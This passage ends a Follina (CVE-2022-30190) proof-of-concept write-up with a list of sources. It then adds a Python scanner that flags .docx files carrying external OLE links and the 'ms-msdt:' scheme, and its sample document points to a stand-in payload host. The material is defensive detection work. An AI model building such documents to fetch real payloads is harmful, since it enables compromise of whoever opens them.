is there without any clicks.<br /><br />## Sources :<br /><br />- https://nao-sec.org/about<br />- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection<br />- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040<br />- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/<br /><br /><br /></code></pre>
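Steps 2 and 3 above leave two distinctive edits in the docx package: an OLE relationship with an external Target and an `<o:OLEObject>` switched from Embed to Link. The following is an added, defender-side example (not part of the PoC write-up): it scans a .docx for exactly those two indicators plus any occurrence of the ms-msdt: scheme. Function names, the constructed sample document and the placeholder URL are my own.

```python
"""Added example: scan a .docx for the external-OLE-link pattern used by the
msdt/Follina PoC.  Constructed sample document; placeholder URL."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_PART = "word/_rels/document.xml.rels"
DOC_PART = "word/document.xml"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def _attrs(tag_body: str) -> dict:
    """name="value" pairs from the inside of an XML start tag."""
    return dict(re.findall(r'([\w:]+)\s*=\s*"([^"]*)"', tag_body))


def external_ole_relationships(rels_xml: bytes) -> list:
    """OLE relationships whose Target is external (the step 2 edit)."""
    hits = []
    for rel in ET.fromstring(rels_xml).iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
            hits.append({"Id": rel.get("Id"), "Target": rel.get("Target")})
    return hits


def linked_ole_objects(document_xml: str) -> list:
    """<o:OLEObject> elements switched from Embed to Link (the step 3 edit)."""
    hits = []
    for body in re.findall(r"<o:OLEObject\b([^>]*?)/?>", document_xml):
        a = _attrs(body)
        if a.get("Type") == "Link":
            hits.append({"Id": a.get("r:id"), "UpdateMode": a.get("UpdateMode")})
    return hits


def scan_docx(data: bytes) -> list:
    """Findings for a .docx given as bytes; an empty list means nothing found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        rels = zf.read(RELS_PART) if RELS_PART in names else b""
        doc = zf.read(DOC_PART).decode("utf-8", "replace") if DOC_PART in names else ""
        external = {r["Id"]: r for r in external_ole_relationships(rels)} if rels else {}
        linked = {o["Id"]: o for o in linked_ole_objects(doc)} if doc else {}
        for rid, rel in external.items():
            obj = linked.get(rid)
            if obj:   # both edits present and cross-referenced by r:id
                findings.append(f"{rid}: linked OLE object fetches external target "
                                f"{rel['Target']} (UpdateMode={obj['UpdateMode']})")
            else:
                findings.append(f"{rid}: external OLE relationship to {rel['Target']}")
        for name in names:   # any part carrying the msdt URI scheme
            if b"ms-msdt:" in zf.read(name):
                findings.append(f"{name}: contains the ms-msdt: URI scheme")
    return findings


def build_sample_docx(target: str, external: bool = True) -> bytes:
    """Constructed minimal docx holding only the two parts the scanner reads.
    external=True mirrors the PoC edits; False mirrors an untouched embed.
    The o: namespace URI is assumed here for the constructed sample."""
    if external:
        rel = (f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
               f'Target="{target}" TargetMode="External"/>')
        ole = '<o:OLEObject Type="Link" r:id="rId5" UpdateMode="OnCall"/>'
    else:
        rel = (f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" '
               'Target="embeddings/oleObject1.bin"/>')
        ole = '<o:OLEObject Type="Embed" r:id="rId5"/>'
    rels_xml = f'<Relationships xmlns="{REL_NS}">{rel}</Relationships>'
    doc_xml = ('<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
               'xmlns:o="urn:schemas-microsoft-com:office:office" '
               'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
               f'<w:body><w:p><w:r><w:object>{ole}</w:object></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(DOC_PART, doc_xml)
        zf.writestr(RELS_PART, rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for line in scan_docx(build_sample_docx("http://payload-server.example/payload.html!")):
        print(line)
```

To use it on a real file, pass `open(path, "rb").read()` to `scan_docx()`; the same checks apply to the RTF variant only after the document has been converted back, since RTF is not a zip package.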